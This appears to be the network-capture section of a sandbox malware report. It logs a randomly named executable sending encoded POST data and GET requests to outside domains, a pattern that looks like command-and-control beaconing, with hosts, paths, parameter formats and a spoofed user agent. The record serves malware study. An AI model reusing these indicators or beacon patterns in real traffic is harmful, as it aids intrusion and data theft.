                                                                      38192.168.2.849747199.59.243.228801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:34.614660978 CET781OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 31 76 5a 72 30 47 42 43 41 52 63 6e 35 73 6c 33 6f 4a 5a 79 6c 37 58 71 72 2f 4d 49 6d 31 6c 48 71 5a 6a 42 4c 53 36 64 64 37 59 6b 44 4f 32 6d 46 71 79 47 4c 58 5a 2f 44 4b 64 4b 55 52 6b 64 30 65 4c 64 42 46 4a 6e 58 56 52 45 49 6a 74 7a 39 62 59 64 42 74 57 66 42 59 2b 49 5a 50 48 63 49 4d 6e 6b 73 31 6f 76 71 6d 62 51 33 46 44 33 2f 48 4d 49 4c 46 44 33 70 51 4d 6d 79 4b 36 58 37 6b 39 4f 33 4d 62 54 36 6a 7a 34 6e 35 78 4a 43 65 68 31 74 57 75 77 47 39 6e 71 33 33 74 76 6f 6d 58 6b 57 79 65 74 33 4b 74 69 2f 30 75 2b 32 77
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg1vZr0GBCARcn5sl3oJZyl7Xqr/MIm1lHqZjBLS6dd7YkDO2mFqyGLXZ/DKdKURkd0eLdBFJnXVREIjtz9bYdBtWfBY+IZPHcIMnks1ovqmbQ3FD3/HMILFD3pQMmyK6X7k9O3MbT6jz4n5xJCeh1tWuwG9nq33tvomXkWyet3Kti/0u+2w
                                                                      Jan 13, 2025 15:14:35.068764925 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:34 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: 2b03d258-1c76-4021-84aa-f6112598f5b8
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=2b03d258-1c76-4021-84aa-f6112598f5b8; expires=Mon, 13 Jan 2025 14:29:35 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:35.068820000 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmIwM2QyNTgtMWM3Ni00MDIxLTg0YWEtZjYxMTI1OThmNWI4IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      39192.168.2.849748199.59.243.228801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:37.162621975 CET1798OUTPOST /dx3i/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.denture-prices.click
                                                                      Origin: http://www.denture-prices.click
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.denture-prices.click/dx3i/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 39 76 5a 61 55 47 54 78 34 52 4f 33 35 73 37 6e 6f 49 5a 79 6b 35 58 71 7a 37 4d 4a 61 4c 6c 45 65 5a 6a 6e 2f 53 71 38 64 37 58 6b 44 4f 35 47 46 72 71 6d 4b 58 5a 2b 76 4f 64 4b 45 52 6b 64 30 65 4c 63 78 46 5a 47 58 56 63 6b 49 67 6b 54 39 66 63 64 42 52 57 66 5a 58 2b 49 73 36 48 74 6f 4d 70 67 49 31 76 63 53 6d 48 41 33 48 51 48 2f 50 4d 50 43 46 44 33 6b 72 4d 6d 76 76 36 58 54 6b 2b 34 71 47 48 43 71 59 69 37 48 5a 2f 5a 43 66 6f 43 51 31 71 42 61 4c 75 39 58 70 74 4b 6b 30 5a 53 47 43 57 75 53 6b 37 46 50 5a 2b 75 48 59 2b 6c 6b 56 77 4a 44 63 43 6c 4a 6a 66 31 65 31 72 45 30 57 6a 2f 45 32 35 51 35 4d 56 69 6b 43 51 7a 52 44 43 67 46 55 6f 46 44 64 4e 32 2f 2f 58 65 30 31 30 4b 2b 34 48 31 4d 48 36 4b 53 35 49 4c 74 4a 4e 68 66 57 33 44 69 48 4d 51 7a 34 74 38 59 74 48 74 51 44 72 50 34 6c 73 37 79 54 6d 43 36 53 4c 48 65 34 4a 48 30 6a 76 65 36 4b 32 [TRUNCATED]
                                                                      Data Ascii: 60q4=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg9vZaUGTx4RO35s7noIZyk5Xqz7MJaLlEeZjn/Sq8d7XkDO5GFrqmKXZ+vOdKERkd0eLcxFZGXVckIgkT9fcdBRWfZX+Is6HtoMpgI1vcSmHA3HQH/PMPCFD3krMmvv6XTk+4qGHCqYi7HZ/ZCfoCQ1qBaLu9XptKk0ZSGCWuSk7FPZ+uHY+lkVwJDcClJjf1e1rE0Wj/E25Q5MVikCQzRDCgFUoFDdN2//Xe010K+4H1MH6KS5ILtJNhfW3DiHMQz4t8YtHtQDrP4ls7yTmC6SLHe4JH0jve6K2KhtLAYbEHpFBd9slS5sWTh8j1j9uhAMJXAWESlfuQ69xb6Gk6/E0EjurDQroav1egoHkcgK1ZCPibUx1AC4Aos1+LfnEPCXZmQCI5+2VqAmCG8q02JwMqS7eeSCIDSIlmxCyZnwyD+GBsHH5h6Pp5Mk0MKgdFFFYd8DVB9DaJCkpqx2UsqsPiseuZi3kfza1VIx6Wz5bx7polcobo06DXtjgLaSB7pR8onFEkFTAZiXZHZLszXqa00wdaMSCel7tMa88G27YyHOLfscJIBM1bLOkCsTm4wn/0z5NOr+n9zTikuIjKFxM6g3UkrsHskeSf757czrBW1UqxTH9GlL1lIArfXU6zOVz93HnXTvoEI4cnwWzu8W3H4mra4QV16iZFYNrsiOA3lN7t2sy1xRGuUFAcpEOIBKBzFZzP5nk9O9Y4Megp4ginNKaZZMkZCgkYEq6PBF1q91L9sBESyqIQJ8odRTB9V7g6FeyYMEBE9JaspnHAlPqfkhdRYT0gvAaL/nYXmv2f+uWI27HWedx+oUN1ZnviD+ctlR5/k6JRNxA6V17LPntG8orWXENW6TSl44rjBaR4huUh7271fcO0eJHHhOoarBE86FxPvSahwAlfXlyWHVLJ73K0EfqUccAyaK2uL99kKts7Cs1Ds+rbNS3PQrhi6j5qq [TRUNCATED]
                                                                      Jan 13, 2025 15:14:37.603966951 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:36 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1146
                                                                      x-request-id: c60d7529-7a19-4afd-b037-79a5bc263127
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                      set-cookie: parking_session=c60d7529-7a19-4afd-b037-79a5bc263127; expires=Mon, 13 Jan 2025 14:29:37 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:37.604029894 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzYwZDc1MjktN2ExOS00YWZkLWIwMzctNzlhNWJjMjYzMTI3IiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      40192.168.2.849749199.59.243.228801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:39.696012020 CET490OUTGET /dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.denture-prices.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:40.163145065 CET1236INHTTP/1.1 200 OK
                                                                      date: Mon, 13 Jan 2025 14:14:39 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1510
                                                                      x-request-id: 4c2989e7-2f0a-417e-87c7-3f6456f8e97d
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CTi4Yc6uqNq/upv2QMfm0FYp/WTcwtjAppg1oJGd0c2PUwNGQLwYyMR+dw54UAsr94cZ0gjlEY51DejOvEMsCQ==
                                                                      set-cookie: parking_session=4c2989e7-2f0a-417e-87c7-3f6456f8e97d; expires=Mon, 13 Jan 2025 14:29:40 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 54 69 34 59 63 36 75 71 4e 71 2f 75 70 76 32 51 4d 66 6d 30 46 59 70 2f 57 54 63 77 74 6a 41 70 70 67 31 6f 4a 47 64 30 63 32 50 55 77 4e 47 51 4c 77 59 79 4d 52 2b 64 77 35 34 55 41 73 72 39 34 63 5a 30 67 6a 6c 45 59 35 31 44 65 6a 4f 76 45 4d 73 43 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CTi4Yc6uqNq/upv2QMfm0FYp/WTcwtjAppg1oJGd0c2PUwNGQLwYyMR+dw54UAsr94cZ0gjlEY51DejOvEMsCQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 15:14:40.163166046 CET963INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGMyOTg5ZTctMmYwYS00MTdlLTg3YzctM2Y2NDU2ZjhlOTdkIiwicGFnZV90aW1lIjoxNzM2Nzc3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      41192.168.2.84975013.228.81.39801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:45.242202044 CET758OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 78 73 42 5a 6e 4f 58 54 76 59 52 62 58 75 54 32 47 6b 54 53 65 68 4a 69 70 33 32 77 59 6f 6f 58 4e 38 36 69 4b 50 66 74 73 72 77 56 42 67 69 45 52 77 41 2b 4b 4c 44 64 48 2f 42 2f 31 53 75 48 45 64 6a 37 64 35 48 65 46 49 2f 75 77 64 2f 72 31 69 5a 57 70 76 73 78 77 43 72 77 34 54 44 65 6c 37 35 57 45 38 73 47 31 78 6e 56 31 57 30 67 69 75 47 39 74 76 53 67 39 7a 67 2f 54 53 41 57 55 35 38 4d 56 37 76 70 71 59 6c 30 58 2b 6f 65 33 50 57 4e 50 43 35 30 2b 7a 39 41 63 5a 46 6f 62 69 62 35 6c 47 2b 61 56 67 64 49 65 71 31 54 42 68 6f 43 61 49 50 32 68 38 3d
                                                                      Data Ascii: 60q4=VRKAxCXV7CRWJxsBZnOXTvYRbXuT2GkTSehJip32wYooXN86iKPftsrwVBgiERwA+KLDdH/B/1SuHEdj7d5HeFI/uwd/r1iZWpvsxwCrw4TDel75WE8sG1xnV1W0giuG9tvSg9zg/TSAWU58MV7vpqYl0X+oe3PWNPC50+z9AcZFobib5lG+aVgdIeq1TBhoCaIP2h8=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      42192.168.2.84975113.228.81.39801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:47.801954985 CET778OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 59 6f 58 76 6b 36 6a 4f 54 66 73 73 72 77 4e 52 68 6f 41 52 77 65 2b 4b 47 38 64 43 48 42 2f 78 36 75 48 41 52 6a 36 75 68 47 52 31 49 39 6c 51 64 39 76 31 69 5a 57 70 76 73 78 30 72 4f 77 38 2f 44 65 56 4c 35 48 51 6f 76 4d 56 78 6f 53 31 57 30 33 79 75 43 39 74 76 30 67 2f 58 61 2f 51 6d 41 57 57 78 38 4d 6e 44 67 6e 71 5a 75 36 33 2f 63 59 48 71 6f 4e 6f 57 45 35 2f 6a 70 65 4d 52 36 70 74 54 78 6a 48 4f 34 5a 56 49 32 49 64 43 44 57 32 38 41 59 35 59 2f 6f 32 70 41 4b 31 57 64 49 47 78 41 38 4c 6c 67 50 55 77 34 4d 51 79 51
                                                                      Data Ascii: 60q4=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtYoXvk6jOTfssrwNRhoARwe+KG8dCHB/x6uHARj6uhGR1I9lQd9v1iZWpvsx0rOw8/DeVL5HQovMVxoS1W03yuC9tv0g/Xa/QmAWWx8MnDgnqZu63/cYHqoNoWE5/jpeMR6ptTxjHO4ZVI2IdCDW28AY5Y/o2pAK1WdIGxA8LlgPUw4MQyQ


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      43192.168.2.84975213.228.81.39801484C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 15:14:50.345083952 CET1795OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 36 30 71 34 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 51 6f 57 61 77 36 73 4a 6e 66 76 73 72 77 54 42 68 6c 41 52 78 43 2b 4b 65 34 64 43 43 32 2f 7a 43 75 49 44 5a 6a 7a 2f 68 47 47 46 49 39 71 77 64 2b 72 31 69 32 57 70 66 6f 78 77 50 4f 77 38 2f 44 65 58 6a 35 58 30 38 76 4b 56 78 6e 56 31 57 6f 67 69 75 36 39 70 44 4b 67 2f 44 4b 34 6a 2b 41 57 32 68 38 4f 79 58 67 72 71 5a 73 39 33 2f 45 59 48 57 4e 4e 73 2b 32 35 2f 58 44 65 50 78 36 6f 61 4b 6f 33 33 4f 6e 4b 6a 45 66 4e 4f 61 38 53 6c 41 5a 54 70 51 33 6f 6d 74 2f 43 43 6a 31 41 30 4a 64 34 70 46 76 4e 53 34 7a 63 45 50 4c 36 66 58 4f 78 6c 58 44 57 6f 6d 7a 37 49 78 50 6d 49 75 2b 7a 5a 59 57 37 44 71 66 73 2f 73 73 32 31 34 46 72 30 78 68 5a 43 44 47 4c 75 5a 36 73 74 79 71 71 77 56 43 2b 66 51 6d 2f 71 36 34 63 4b 47 6c 51 72 53 4b 41 4e 36 65 59 79 30 79 37 5a 31 78 5a 49 4c 48 57 31 38 42 56 58 77 37 62 57 30 4f 7a 48 64 4b 55 61 51 56 4b 31 35 34 72 [TRUNCATED]
